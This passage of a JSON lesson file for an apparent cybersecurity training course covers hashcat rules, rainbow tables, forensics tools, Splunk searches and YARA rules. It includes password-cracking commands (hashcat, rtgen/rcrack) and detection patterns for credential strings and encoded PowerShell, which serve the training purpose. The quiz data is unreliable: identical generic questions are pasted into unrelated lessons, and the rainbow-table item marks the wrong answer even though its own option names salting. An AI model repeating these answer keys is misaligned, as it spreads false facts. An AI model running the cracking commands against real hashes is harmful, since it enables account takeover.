replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr2-wordlist-rules","cat":"Cryptography","title":"Hashcat Rules for Cracking","diff":2,"xp":150,"intro":"Transform wordlists with rules for better cracking success.","sections":[{"type":"text","content":"Rules add numbers, symbols, capitalize, reverse, and combine words."},{"type":"code","lang":"bash","content":"hashcat -m 0 hashes.txt rockyou.txt -r rules/best64.rule\n# Rules: $1 (append 1), ^! (prepend !), c (capitalize)\n# 'password' becomes: Password, password1, !password, PASSWORD"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Rules improve cracking by...","opts":["Using longer lists","Generating variations from base words","Encryption","Compression"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"cr2-rainbow-gen","cat":"Cryptography","title":"Rainbow Table Generation","diff":3,"xp":200,"intro":"Pre-compute hash tables for instant lookup.","sections":[{"type":"text","content":"Trade disk for time: generate tables once, look up hashes instantly."},{"type":"code","lang":"bash","content":"rtgen md5 loweralpha-numeric 1 7 0 2400 8000000 all\nrtsort *.rt\nrcrack *.rt -h 5d41402abc4b2a76b9719d911017c592"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Rainbow tables are defeated by...","opts":["Longer passwords","Salting (each salt needs a separate table)","Faster hashing","Key stretching"],"ans":0},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"fo2-plaso","cat":"Forensics & IR","title":"Super Timeline with Plaso","diff":3,"xp":200,"intro":"Combine ALL artifact timestamps into one timeline.","sections":[{"type":"text","content":"Plaso extracts timestamps from files, registry, logs, browser, prefetch \u2014 everything."},{"type":"code","lang":"bash","content":"log2timeline.py timeline.plaso evidence.dd\npsort.py -o l2tcsv timeline.plaso -w timeline.csv"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Super timelines combine...","opts":["Only file times","ALL artifact timestamps into one chronological view","Only logs","Only registry"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention matters because...","opts":["Space","Needed for incident investigation","Slow systems","Contain passwords"],"ans":1},{"type":"quiz","q":"Threat modeling identifies...","opts":["Network speed","Potential threats during design","Encryption strength","User satisfaction"],"ans":1},{"type":"quiz","q":"DMZ is...","opts":["Encryption","Zone between internal and external networks","User group","Firewall brand"],"ans":1},{"type":"quiz","q":"SOC stands for...","opts":["Security Operations Center","System Output","Secure Online","Standard Operating"],"ans":0},{"type":"quiz","q":"NIST 800-53 provides...","opts":["Algorithms","Security controls catalog","Diagrams","Passwords only"],"ans":1},{"type":"quiz","q":"XDR extends EDR by...","opts":["More endpoints","Correlating across endpoints, network, cloud","Speed","Cost"],"ans":1},{"type":"quiz","q":"Security baseline is...","opts":["Attack start","Minimum security configuration","Firewall","Encryption key"],"ans":1},{"type":"quiz","q":"Playbook defines...","opts":["Game strategy","Pre-defined response steps for incidents","Log file","Firewall rule"],"ans":1},{"type":"quiz","q":"SOAR automates...","opts":["Attacks","Repetitive SOC tasks","Encryption","Development"],"ans":1},{"type":"quiz","q":"Sigma rules convert to...","opts":["Only Splunk","Any SIEM query language","Only Elastic","Only KQL"],"ans":1},{"type":"quiz","q":"False positive means...","opts":["Real attack detected","Normal traffic flagged as attack","Attack missed","IDS crashed"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One firewall","Multiple overlapping security layers","Deep inspection","Encrypt everything"],"ans":1},{"type":"quiz","q":"Incident classification P1 means...","opts":["Low","Critical active breach","Medium","Info"],"ans":1},{"type":"quiz","q":"3-2-1 backup rule is...","opts":["3 servers","3 copies, 2 media, 1 offsite","3 keys","3 passwords"],"ans":1}]},{"id":"fo2-strings","cat":"Forensics & IR","title":"Strings Analysis Techniques","diff":1,"xp":75,"intro":"Extract readable text from any binary file.","sections":[{"type":"text","content":"strings reveals URLs, error messages, registry keys, and credentials embedded in binaries."},{"type":"code","lang":"bash","content":"strings -a malware.exe | grep -iE 'http|password|cmd|reg'\nstrings -el malware.exe  # Unicode strings"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"strings analysis reveals...","opts":["Source code","Embedded text: URLs, messages, credentials","Compilation flags","Encryption keys always"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"fo2-procmon","cat":"Forensics & IR","title":"Process Monitor Analysis","diff":2,"xp":150,"intro":"Track process behavior in real-time with ProcMon.","sections":[{"type":"text","content":"ProcMon logs: file access, registry queries, network connections, and process creation \u2014 per process."},{"type":"code","lang":"bash","content":"# Filters:\n# Process Name = malware.exe\n# Operation = CreateFile\n# Path contains = AppData\n# Result = SUCCESS"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"ProcMon tracks...","opts":["Only network","File, registry, network, and process activity per process","Only files","Only memory"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"df2-splunk-queries","cat":"Defense & Blue Team","title":"Essential Splunk Searches","diff":2,"xp":150,"intro":"Key SPL queries for security monitoring.","sections":[{"type":"text","content":"Failed logins, PowerShell execution, lateral movement, and data exfil detection."},{"type":"code","lang":"bash","content":"# Failed logins\nindex=auth action=failure | stats count by src_ip | where count>10\n# Encoded PowerShell\nindex=sysmon EventCode=1 CommandLine=*-enc*"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Splunk SPL is used to...","opts":["Create alerts only","Search, analyze, and correlate security log data","Only graph data","Only store logs"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1}]},{"id":"df2-yara-create","cat":"Defense & Blue Team","title":"Creating YARA Rules","diff":2,"xp":150,"intro":"Write detection rules for malware families.","sections":[{"type":"text","content":"Define string patterns, hex bytes, and conditions to match malware."},{"type":"code","lang":"bash","content":"rule Backdoor {\n  strings:\n    $s1 = \"CreateRemoteThread\"\n    $s2 = \"VirtualAllocEx\"\n  condition:\n    all of them and filesize < 1MB\n}"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","String and byte patterns in files","Only hashes","Only file names"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1}]},{"id":"df2-incident-metrics","cat":"Defense & Blue Team","title":"Measuring IR Effectiveness","diff":2,"xp":150,"intro":"Track MTTD and MTTR to improve response capability.","sections":[{"type":"text","content":"Mean Time to Detect and Mean Time to Remediate are the key IR metrics."},{"type":"code","lang":"bash","content":"# MTTD: avg time from compromise to detection\n# Goal: < 24 hours\n# MTTR: avg time from detection to remediation\n# Goal: Critical < 48 hours"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"MTTD measures...","opts":["Patch speed","Time from compromise to detection","User satisfaction","Network speed"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive 